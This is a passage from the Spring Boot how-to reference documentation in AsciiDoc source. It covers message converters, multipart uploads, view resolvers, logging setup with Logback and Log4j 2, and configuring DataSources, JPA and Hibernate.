custom\nmodules when you add new features to your application.\n\nIf you want to replace the default `ObjectMapper` completely, either define a `@Bean` of\nthat type and mark it as `@Primary` or, if you prefer the builder-based\napproach, define a `Jackson2ObjectMapperBuilder` `@Bean`. Note that, in either case,\ndoing so disables all auto-configuration of the `ObjectMapper`.\n\nIf you provide any `@Beans` of type `MappingJackson2HttpMessageConverter`,\nthey replace the default value in the MVC configuration. Also, a convenience bean of type\n`HttpMessageConverters` is provided (and is always available if you use the default MVC\nconfiguration). It has some useful methods to access the default and user-enhanced\nmessage converters.\n\nSee the \"`<<howto-customize-the-responsebody-rendering>>`\" section and the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-customize-the-responsebody-rendering]]\n=== Customize the @ResponseBody Rendering\nSpring uses `HttpMessageConverters` to render `@ResponseBody` (or responses from\n`@RestController`). You can contribute additional converters by adding beans of the\nappropriate type in a Spring Boot context. If a bean you add is of a type that would have\nbeen included by default anyway (such as `MappingJackson2HttpMessageConverter` for JSON\nconversions), it replaces the default value. A convenience bean of type\n`HttpMessageConverters` is provided and is always available if you use the default MVC\nconfiguration. It has some useful methods to access the default and user-enhanced message\nconverters (For example, it can be useful if you want to manually inject them into a\ncustom `RestTemplate`).\n\nAs in normal MVC usage, any `WebMvcConfigurer` beans that you provide can also\ncontribute converters by overriding the `configureMessageConverters` method. However, unlike\nwith normal MVC, you can supply only additional converters that you need (because Spring\nBoot uses the same mechanism to contribute its defaults). Finally, if you opt out of the\nSpring Boot default MVC configuration by providing your own `@EnableWebMvc` configuration,\nyou can take control completely and do everything manually by using\n`getMessageConverters` from `WebMvcConfigurationSupport`.\n\nSee the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-multipart-file-upload-configuration]]\n=== Handling Multipart File Uploads\nSpring Boot embraces the Servlet 3 `javax.servlet.http.Part` API to support uploading\nfiles. By default, Spring Boot configures Spring MVC with a maximum size of 1MB per\nfile and a maximum of 10MB of file data in a single request. You may override these\nvalues, the location to which intermediate data is stored (for example, to the `\/tmp`\ndirectory), and the threshold past which data is flushed to disk by using the properties\nexposed in the `MultipartProperties` class. For example, if you want to specify that\nfiles be unlimited, set the `spring.servlet.multipart.max-file-size` property to `-1`.\n\nThe multipart support is helpful when you want to receive multipart encoded file data as\na `@RequestParam`-annotated parameter of type `MultipartFile` in a Spring MVC controller\nhandler method.\n\nSee the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/MultipartAutoConfiguration.{sc-ext}[`MultipartAutoConfiguration`]\nsource for more details.\n\nNOTE: It is recommended to use the container's built-in support for multipart uploads\nrather than introducing an additional dependency such as Apache Commons File Upload.\n\n\n\n[[howto-switch-off-the-spring-mvc-dispatcherservlet]]\n=== Switch Off the Spring MVC DispatcherServlet\nBy default, all content is served from the root of your application (`\/`). If you\nwould rather map to a different path, you can configure one as follows:\n\n[source,properties,indent=0,subs=\"verbatim\"]\n----\n\tspring.mvc.servlet.path=\/acme\n----\n\nIf you have additional servlets you can declare a `@Bean` of type `Servlet` or\n`ServletRegistrationBean` for each and Spring Boot will register them transparently to the\ncontainer. Because servlets are registered that way, they can be mapped to a sub-context\nof the `DispatcherServlet` without invoking it.\n\nConfiguring the `DispatcherServlet` yourself is unusual but if you really need to do it, a\n`@Bean` of type `DispatcherServletPath` must be provided as well to provide the path of\nyour custom `DispatcherServlet`.\n\n\n\n[[howto-switch-off-default-mvc-configuration]]\n=== Switch off the Default MVC Configuration\nThe easiest way to take complete control over MVC configuration is to provide your own\n`@Configuration` with the `@EnableWebMvc` annotation. Doing so leaves all MVC\nconfiguration in your hands.\n\n\n\n[[howto-customize-view-resolvers]]\n=== Customize ViewResolvers\nA `ViewResolver` is a core component of Spring MVC, translating view names in\n`@Controller` to actual `View` implementations. Note that `ViewResolvers` are mainly\nused in UI applications, rather than REST-style services (a `View` is not used to render\na `@ResponseBody`). There are many implementations of `ViewResolver` to choose from, and\nSpring on its own is not opinionated about which ones you should use. Spring Boot, on the\nother hand, installs one or two for you, depending on what it finds on the classpath and\nin the application context. The `DispatcherServlet` uses all the resolvers it finds in\nthe application context, trying each one in turn until it gets a result, so, if you\nadd your own, you have to be aware of the order and in which position your resolver is\nadded.\n\n`WebMvcAutoConfiguration` adds the following `ViewResolvers` to your context:\n\n* An `InternalResourceViewResolver` named '`defaultViewResolver`'. This one locates\nphysical resources that can be rendered by using the `DefaultServlet` (including static\nresources and JSP pages, if you use those). It applies a prefix and a suffix to the\nview name and then looks for a physical resource with that path in the servlet context\n(the defaults are both empty but are accessible for external configuration through\n`spring.mvc.view.prefix` and `spring.mvc.view.suffix`). You can override it by\nproviding a bean of the same type.\n* A `BeanNameViewResolver` named '`beanNameViewResolver`'. This is a useful member of the\nview resolver chain and picks up any beans with the same name as the `View` being\nresolved. It should not be necessary to override or replace it.\n* A `ContentNegotiatingViewResolver` named '`viewResolver`' is added only if there *are*\nactually beans of type `View` present. This is a '`master`' resolver, delegating to all\nthe others and attempting to find a match to the '`Accept`' HTTP header sent by the\nclient. There is a useful\nhttps:\/\/spring.io\/blog\/2013\/06\/03\/content-negotiation-using-views[blog about\n`ContentNegotiatingViewResolver`] that you might like to study to learn more, and you\nmight also look at the source code for detail. You can switch off the auto-configured\n`ContentNegotiatingViewResolver` by defining a bean named '`viewResolver`'.\n* If you use Thymeleaf, you also have a `ThymeleafViewResolver` named\n'`thymeleafViewResolver`'. It looks for resources by surrounding the view name with a\nprefix and suffix. The prefix is `spring.thymeleaf.prefix`, and the suffix is\n`spring.thymeleaf.suffix`. The values of the prefix and suffix default to\n'`classpath:\/templates\/`' and '`.html`', respectively. You can override\n`ThymeleafViewResolver` by providing a bean of the same name.\n* If you use FreeMarker, you also have a `FreeMarkerViewResolver` named\n'`freeMarkerViewResolver`'. It looks for resources in a loader path (which is\nexternalized to `spring.freemarker.templateLoaderPath` and has a default value of\n'`classpath:\/templates\/`') by surrounding the view name with a prefix and a suffix. The\nprefix is externalized to `spring.freemarker.prefix`, and the suffix is externalized to\n`spring.freemarker.suffix`. The default values of the prefix and suffix are empty and\n'`.ftl`', respectively. You can override `FreeMarkerViewResolver` by providing a bean\nof the same name.\n* If you use Groovy templates (actually, if `groovy-templates` is on your classpath), you\nalso have a `GroovyMarkupViewResolver` named '`groovyMarkupViewResolver`'. It looks for\nresources in a loader path by surrounding the view name with a prefix and suffix\n(externalized to `spring.groovy.template.prefix` and `spring.groovy.template.suffix`).\nThe prefix and suffix have default values of '`classpath:\/templates\/`' and '`.tpl`',\nrespectively. You can override `GroovyMarkupViewResolver` by providing a bean of the\nsame name.\n\nFor more detail, see the following sections:\n\n* {sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\n* {sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]\n* {sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]\n* {sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\n\n\n\n[[howto-use-test-with-spring-security]]\n== Testing With Spring Security\nSpring Security provides support for running tests as a specific user.\nFor example, the test in the snippet below will run with an authenticated user\nthat has the `ADMIN` role.\n\n[source,java,indent=0]\n----\n\t@Test\n\t@WithMockUser(roles=\"ADMIN\")\n\tpublic void requestProtectedUrlWithUser() throws Exception {\n\t\tmvc\n\t\t\t.perform(get(\"\/\"))\n\t\t\t...\n\t}\n----\n\nSpring Security provides comprehensive integration with Spring MVC Test and\nthis can also be used when testing controllers using the `@WebMvcTest` slice and `MockMvc`.\n\nFor additional details on Spring Security's testing support, refer to Spring Security's\nhttps:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/reference\/htmlsingle\/#test[reference documentation]).\n\n\n\n[[howto-jersey]]\n== Jersey\n\n\n\n[[howto-jersey-spring-security]]\n=== Secure Jersey endpoints with Spring Security\nSpring Security can be used to secure a Jersey-based web application in much the same\nway as it can be used to secure a Spring MVC-based web application. However, if you want\nto use Spring Security's method-level security with Jersey, you must configure Jersey to\nuse `setStatus(int)` rather `sendError(int)`. This prevents Jersey from committing the\nresponse before Spring Security has had an opportunity to report an authentication or\nauthorization failure to the client.\n\nThe `jersey.config.server.response.setStatusOverSendError` property must be set to `true`\non the application's `ResourceConfig` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jersey\/JerseySetStatusOverSendErrorExample.java[tag=resource-config]\n----\n\n\n\n[[howto-http-clients]]\n== HTTP Clients\n\nSpring Boot offers a number of starters that work with HTTP clients. This section answers\nquestions related to using them.\n\n[[howto-http-clients-proxy-configuration]]\n=== Configure RestTemplate to Use a Proxy\nAs described in <<spring-boot-features.adoc#boot-features-resttemplate-customization>>,\nyou can use a `RestTemplateCustomizer` with `RestTemplateBuilder` to build a customized\n`RestTemplate`. This is the recommended approach for creating a `RestTemplate` configured\nto use a proxy.\n\nThe exact details of the proxy configuration depend on the underlying client request\nfactory that is being used. The following example configures\n`HttpComponentsClientRequestFactory` with an `HttpClient` that uses a proxy for all hosts\nexcept `192.168.0.5`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/client\/RestTemplateProxyCustomizationExample.java[tag=customizer]\n----\n\n\n\n[[howto-logging]]\n== Logging\n\nSpring Boot has no mandatory logging dependency, except for the Commons Logging API, which\nis typically provided by Spring Framework's `spring-jcl` module. To use\nhttp:\/\/logback.qos.ch[Logback], you need to include it and `spring-jcl` on the classpath.\nThe simplest way to do that is through the starters, which all depend on\n`spring-boot-starter-logging`. For a web application, you need only\n`spring-boot-starter-web`, since it depends transitively on the logging starter. If you\nuse Maven, the following dependency adds logging for you:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n----\n\nSpring Boot has a `LoggingSystem` abstraction that attempts to configure logging based on\nthe content of the classpath. If Logback is available, it is the first choice.\n\nIf the only change you need to make to logging is to set the levels of various loggers,\nyou can do so in `application.properties` by using the \"logging.level\" prefix, as shown\nin the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nYou can also set the location of a file to which to write the log (in addition to the\nconsole) by using \"logging.file\".\n\nTo configure the more fine-grained settings of a logging system, you need to use the native\nconfiguration format supported by the `LoggingSystem` in question. By default, Spring Boot\npicks up the native configuration from its default location for the system (such as\n`classpath:logback.xml` for Logback), but you can set the location of the config file by\nusing the \"logging.config\" property.\n\n\n\n[[howto-configure-logback-for-logging]]\n=== Configure Logback for Logging\nIf you put a `logback.xml` in the root of your classpath, it is picked up from there (or\nfrom `logback-spring.xml`, to take advantage of the templating features provided by\nBoot). Spring Boot provides a default base configuration that you can include if you\nwant to set levels, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/base.xml\"\/>\n\t\t<logger name=\"org.springframework.web\" level=\"DEBUG\"\/>\n\t<\/configuration>\n----\n\nIf you look at `base.xml` in the spring-boot jar, you can see that it uses\nsome useful System properties that the `LoggingSystem` takes care of creating for you:\n\n* `${PID}`: The current process ID.\n* `${LOG_FILE}`: Whether `logging.file` was set in Boot's external configuration.\n* `${LOG_PATH}`: Whether `logging.path` (representing a directory for\n log files to live in) was set in Boot's external configuration.\n* `${LOG_EXCEPTION_CONVERSION_WORD}`: Whether `logging.exception-conversion-word` was set\n in Boot's external configuration.\n\nSpring Boot also provides some nice ANSI color terminal output on a console (but not in\na log file) by using a custom Logback converter. See the default `base.xml` configuration\nfor details.\n\nIf Groovy is on the classpath, you should be able to configure Logback with\n`logback.groovy` as well. If present, this setting is given preference.\n\n\n\n[[howto-configure-logback-for-logging-fileonly]]\n==== Configure Logback for File-only Output\nIf you want to disable console logging and write output only to a file, you need a custom\n`logback-spring.xml` that imports `file-appender.xml` but not `console-appender.xml`, as\nshown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\" \/>\n\t\t<property name=\"LOG_FILE\" value=\"${LOG_FILE:-${LOG_PATH:-${LOG_TEMP:-${java.io.tmpdir:-\/tmp}}\/}spring.log}\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/file-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"FILE\" \/>\n\t\t<\/root>\n\t<\/configuration>\n----\n\nYou also need to add `logging.file` to your `application.properties`, as shown in the\nfollowing example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.file=myapplication.log\n----\n\n\n\n[[howto-configure-log4j-for-logging]]\n=== Configure Log4j for Logging\nSpring Boot supports http:\/\/logging.apache.org\/log4j\/2.x[Log4j 2] for logging\nconfiguration if it is on the classpath. If you use the starters for\nassembling dependencies, you have to exclude Logback and then include log4j 2\ninstead. If you do not use the starters, you need to provide (at least) `spring-jcl` in\naddition to Log4j 2.\n\nThe simplest path is probably through the starters, even though it requires some\njiggling with excludes. The following example shows how to set up the starters in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-logging<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-log4j2<\/artifactId>\n\t<\/dependency>\n----\n\nAnd the following example shows one way to set up the starters in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-web'\n\t\tcompile 'org.springframework.boot:spring-boot-starter-log4j2'\n\t}\n\n\tconfigurations {\n\t\tall {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'\n\t\t}\n\t}\n----\n\nNOTE: The Log4j starters gather together the dependencies for common logging\nrequirements (such as having Tomcat use `java.util.logging` but configuring the\noutput using Log4j 2). See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-actuator-log4j2[Actuator Log4j 2]\nsamples for more detail and to see it in action.\n\nNOTE: To ensure that debug logging performed using `java.util.logging` is routed into\nLog4j 2, configure its https:\/\/logging.apache.org\/log4j\/2.0\/log4j-jul\/index.html[JDK\nlogging adapter] by setting the `java.util.logging.manager` system property to\n`org.apache.logging.log4j.jul.LogManager`.\n\n\n\n[[howto-configure-log4j-for-logging-yaml-or-json-config]]\n==== Use YAML or JSON to Configure Log4j 2\nIn addition to its default XML configuration format, Log4j 2 also supports YAML and JSON\nconfiguration files. To configure Log4j 2 to use an alternative configuration file format,\nadd the appropriate dependencies to the classpath and name your\nconfiguration files to match your chosen file format, as shown in the following example:\n\n[cols=\"10,75,15\"]\n|===\n|Format|Dependencies|File names\n\n|YAML\na| `com.fasterxml.jackson.core:jackson-databind` +\n `com.fasterxml.jackson.dataformat:jackson-dataformat-yaml`\na| `log4j2.yaml` +\n `log4j2.yml`\n\n|JSON\na| `com.fasterxml.jackson.core:jackson-databind`\na| `log4j2.json` +\n `log4j2.jsn`\n|===\n\n[[howto-data-access]]\n== Data Access\n\nSpring Boot includes a number of starters for working with data sources. This section\nanswers questions related to doing so.\n\n[[howto-configure-a-datasource]]\n=== Configure a Custom DataSource\nTo configure your own `DataSource`, define a `@Bean` of that type in your configuration.\nSpring Boot reuses your `DataSource` anywhere one is required, including database\ninitialization. If you need to externalize some settings, you can bind your\n`DataSource` to the environment (see\n\"`<<spring-boot-features.adoc#boot-features-external-config-3rd-party-configuration>>`\").\n\nThe following example shows how to define a data source in a bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() {\n\t\treturn new FancyDataSource();\n\t}\n----\n\nThe following example shows how to define a data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:h2:mem:mydb\n\tapp.datasource.username=sa\n\tapp.datasource.pool-size=30\n----\n\nAssuming that your `FancyDataSource` has regular JavaBean properties for the URL, the\nusername, and the pool size, these settings are bound automatically before the\n`DataSource` is made available to other components. The regular\n<<howto-initialize-a-database-using-spring-jdbc,database initialization>> also happens\n(so the relevant sub-set of `spring.datasource.*` can still be used with your custom\nconfiguration).\n\nSpring Boot also provides a utility builder class, called `DataSourceBuilder`, that can\nbe used to create one of the standard data sources (if it is on the classpath). The\nbuilder can detect the one to use based on what's available on the classpath. It also\nauto-detects the driver based on the JDBC URL.\n\nThe following example shows how to create a data source by using a `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/BasicDataSourceExample.java[tag=configuration]\n----\n\nTo run an app with that `DataSource`, all you need is the connection\ninformation. Pool-specific settings can also be provided. Check the implementation that\nis going to be used at runtime for more details.\n\nThe following example shows how to define a JDBC data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.pool-size=30\n----\n\nHowever, there is a catch. Because the actual type of the connection pool is not exposed,\nno keys are generated in the metadata for your custom `DataSource` and no completion is\navailable in your IDE (because the `DataSource` interface exposes no properties). Also, if\nyou happen to have Hikari on the classpath, this basic setup does not work, because Hikari\nhas no `url` property (but does have a `jdbcUrl` property). In that case, you must rewrite\nyour configuration as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.jdbc-url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.maximum-pool-size=30\n----\n\nYou can fix that by forcing the connection pool to use and return a dedicated\nimplementation rather than `DataSource`. You cannot change the implementation\nat runtime, but the list of options will be explicit.\n\nThe following example shows how create a `HikariDataSource` with `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleDataSourceExample.java[tag=configuration]\n----\n\nYou can even go further by leveraging what `DataSourceProperties` does for you -- that is,\nby providing a default embedded database with a sensible username and password if no URL\nis provided. You can easily initialize a `DataSourceBuilder` from the state of any\n`DataSourceProperties` object, so you could also inject the DataSource that Spring Boot\ncreates automatically. However, that would split your configuration into two namespaces:\n`url`, `username`, `password`, `type`, and `driver` on `spring.datasource` and the rest on\nyour custom namespace (`app.datasource`). To avoid that, you can redefine a custom\n`DataSourceProperties` on your custom namespace, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/ConfigurableDataSourceExample.java[tag=configuration]\n----\n\nThis setup puts you _in sync_ with what Spring Boot does for you by default, except that\na dedicated connection pool is chosen (in code) and its settings are exposed in the\n`app.datasource.configuration` sub namespace. Because `DataSourceProperties` is taking\ncare of the `url`\/`jdbcUrl` translation for you, you can configure it as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.configuration.maximum-pool-size=30\n----\n\nTIP: Spring Boot will expose Hikari-specific settings to `spring.datasource.hikari`. This\nexample uses a more generic `configuration` sub namespace as the example does not support\nmultiple datasource implementations.\n\nNOTE: Because your custom configuration chooses to go with Hikari, `app.datasource.type`\nhas no effect. In practice, the builder is initialized with whatever value you\nmight set there and then overridden by the call to `.type()`.\n\nSee \"`<<spring-boot-features.adoc#boot-features-configure-datasource>>`\" in the\n\"`Spring Boot features`\" section and the\n{sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[`DataSourceAutoConfiguration`]\nclass for more details.\n\n\n\n[[howto-two-datasources]]\n=== Configure Two DataSources\nIf you need to configure multiple data sources, you can apply the same tricks that are\ndescribed in the previous section. You must, however, mark one of the `DataSource`\ninstances as `@Primary`, because various auto-configurations down the road expect to be\nable to get one by type.\n\nIf you create your own `DataSource`, the auto-configuration backs off. In the following\nexample, we provide the _exact_ same feature set as the auto-configuration provides\non the primary data source:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleTwoDataSourcesExample.java[tag=configuration]\n----\n\nTIP: `firstDataSourceProperties` has to be flagged as `@Primary` so that the database\ninitializer feature uses your copy (if you use the initializer).\n\nBoth data sources are also bound for advanced customizations. For instance, you could\nconfigure them as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.first.url=jdbc:mysql:\/\/localhost\/first\n\tapp.datasource.first.username=dbuser\n\tapp.datasource.first.password=dbpass\n\tapp.datasource.first.configuration.maximum-pool-size=30\n\n\tapp.datasource.second.url=jdbc:mysql:\/\/localhost\/second\n\tapp.datasource.second.username=dbuser\n\tapp.datasource.second.password=dbpass\n\tapp.datasource.second.max-total=30\n----\n\nYou can apply the same concept to the secondary `DataSource` as well, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/CompleteTwoDataSourcesExample.java[tag=configuration]\n----\n\nThe preceding example configures two data sources on custom namespaces with the same\nlogic as Spring Boot would use in auto-configuration. Note that each `configuration` sub\nnamespace provides advanced settings based on the chosen implementation.\n\n\n\n[[howto-use-spring-data-repositories]]\n=== Use Spring Data Repositories\nSpring Data can create implementations of `@Repository` interfaces of various flavors.\nSpring Boot handles all of that for you, as long as those `@Repositories` are included in\nthe same package (or a sub-package) of your `@EnableAutoConfiguration` class.\n\nFor many applications, all you need is to put the right Spring Data dependencies on\nyour classpath (there is a `spring-boot-starter-data-jpa` for JPA and a\n`spring-boot-starter-data-mongodb` for Mongodb) and create some repository interfaces to\nhandle your `@Entity` objects. Examples are in the\n{github-code}\/spring-boot-samples\/spring-boot-sample-data-jpa[JPA sample] and the\n{github-code}\/spring-boot-samples\/spring-boot-sample-data-mongodb[Mongodb sample].\n\nSpring Boot tries to guess the location of your `@Repository` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, use the `@EnableJpaRepositories`\nannotation (from Spring Data JPA).\n\nFor more about Spring Data, see the {spring-data}[Spring Data project page].\n\n\n\n[[howto-separate-entity-definitions-from-spring-configuration]]\n=== Separate @Entity Definitions from Spring Configuration\nSpring Boot tries to guess the location of your `@Entity` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, you can use the `@EntityScan`\nannotation, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableAutoConfiguration\n\t@EntityScan(basePackageClasses=City.class)\n\tpublic class Application {\n\n\t\t\/\/...\n\n\t}\n----\n\n\n\n[[howto-configure-jpa-properties]]\n=== Configure JPA Properties\nSpring Data JPA already provides some vendor-independent configuration options (such as\nthose for SQL logging), and Spring Boot exposes those options and a few more for Hibernate\nas external configuration properties. Some of them are automatically detected according to\nthe context so you should not have to set them.\n\nThe `spring.jpa.hibernate.ddl-auto` is a special case, because, depending on runtime\nconditions, it has different defaults. If an embedded database is used and no schema\nmanager (such as Liquibase or Flyway) is handling the `DataSource`, it defaults to\n`create-drop`. In all other cases, it defaults to `none`.\n\nThe dialect to use is also automatically detected based on the current `DataSource`, but\nyou can set `spring.jpa.database` yourself if you want to be explicit and bypass that\ncheck on startup.\n\nNOTE: Specifying a `database` leads to the configuration of a well-defined Hibernate\ndialect. Several databases have more than one `Dialect`, and this may not suit your needs.\nIn that case, you can either set `spring.jpa.database` to `default` to let Hibernate\nfigure things out or set the dialect by setting the `spring.jpa.database-platform`\nproperty.\n\nThe most common options to set are shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=com.example.MyPhysicalNamingStrategy\n\tspring.jpa.show-sql=true\n----\n\nIn addition, all properties in `+spring.jpa.properties.*+` are passed through as normal\nJPA properties (with the prefix stripped) when the local `EntityManagerFactory` is\ncreated.\n\nTIP: If you need to apply advanced customization to Hibernate properties, consider\nregistering a `HibernatePropertiesCustomizer` bean that will be invoked prior to creating\nthe `EntityManagerFactory`. This takes precedence to anything that is applied by the\nauto-configuration.\n\n\n\n[[howto-configure-hibernate-naming-strategy]]\n=== Configure Hibernate Naming Strategy\nHibernate uses {hibernate-documentation}#naming[two different naming strategies] to map\nnames from the object model to the corresponding database names. The fully qualified\nclass name of the physical and the implicit strategy implementations can be configured by\nsetting the `spring.jpa.hibernate.naming.physical-strategy` and\n`spring.jpa.hibernate.naming.implicit-strategy` properties, respectively. Alternatively,\nif `ImplicitNamingStrategy` or `PhysicalNamingStrategy` beans are available in the\napplication context, Hibernate will be automatically configured to use them.\n\nBy default, Spring Boot configures the physical naming strategy with\n`SpringPhysicalNamingStrategy`. This implementation provides the same table structure as\nHibernate 4: all dots are replaced by underscores and camel casing is replaced by\nunderscores as well. By default, all table names are generated in lower case, but it is\npossible to override that flag if your schema requires it.\n\nFor example, a `TelephoneNumber` entity is mapped to the `telephone_number` table.\n\nIf you prefer to use Hibernate 5's default instead, set the following property:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=org.hibernate.boot.model.naming.PhysicalNamingStrategyStandardImpl\n----\n\nAlternatively, you can configure the following bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic PhysicalNamingStrategy physicalNamingStrategy() {\n\t\treturn new PhysicalNamingStrategyStandardImpl();\n\t}\n----\n\nSee {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[`HibernateJpaAutoConfiguration`]\nand {sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor more details.\n\n\n\n[[howto-configure-hibernate-second-level-caching]]\n=== Configure Hibernate Second-Level Caching\nHibernate {hibernate-documentation}#caching[second-level cache] can be configured for a\nrange of cache providers. Rather than configuring Hibernate to lookup the cache provider\nagain, it is better to provide the one that is available in the context whenever possible.\n\nIf you're using JCache, this is pretty easy. First, make sure that\n`org.hibernate:hibernate-jcache` is available on the classpath. Then, add a\n`HibernatePropertiesCustomizer` bean as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jpa\/HibernateSecondLevelCacheExample.java[tag=configuration]\n----\n\nThis customizer will configure Hibernate to use the same `CacheManager` as the one that\nthe application uses. It is also possible to use separate `CacheManager` instances. For\ndetails, refer to {hibernate-documentation}#caching-provider-jcache[the Hibernate user\nguide].\n\n\n\n[[howto-use-dependency-injection-hibernate-components]]\n=== Use Dependency Injection in Hibernate Components\nBy default, Spring Boot registers a `BeanContainer` implementation that uses the\n`BeanFactory` so that converters and entity listeners can use regular dependency\ninjection.\n\nYou can disable or tune this behaviour by registering a `HibernatePropertiesCustomizer`\nthat removes or changes the `hibernate.resource.beans.container` property.\n\n\n\n[[howto-use-custom-entity-manager]]\n=== Use a Custom EntityManagerFactory\nTo take full control of the configuration of the `EntityManagerFactory`, you need to add\na `@Bean` named '`entityManagerFactory`'. Spring Boot auto-configuration switches off its\nentity manager in the presence of a bean of that type.\n\n\n\n[[howto-use-two-entity-managers]]\n=== Use Two EntityManagers\nEven if the default `EntityManagerFactory` works fine, you need to define a new one.\nOtherwise, the presence of the second bean of that type switches off the\ndefault. To make it easy to do, you can use the convenient `EntityManagerBuilder`\nprovided by Spring Boot. Alternatively, you can just the\n`LocalContainerEntityManagerFactoryBean` directly from Spring ORM, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ add two data sources configured as above\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean customerEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(customerDataSource())\n\t\t\t\t.packages(Customer.class)\n\t\t\t\t.persistenceUnit(\"customers\")\n\t\t\t\t.build();\n\t}\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean orderEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(orderDataSource())\n\t\t\t\t.packages(Order.class)\n\t\t\t\t.persistenceUnit(\"orders\")\n\t\t\t\t.build();\n\t}\n----\n\nThe configuration above almost works on its own. To complete the picture, you need to\nconfigure `TransactionManagers` 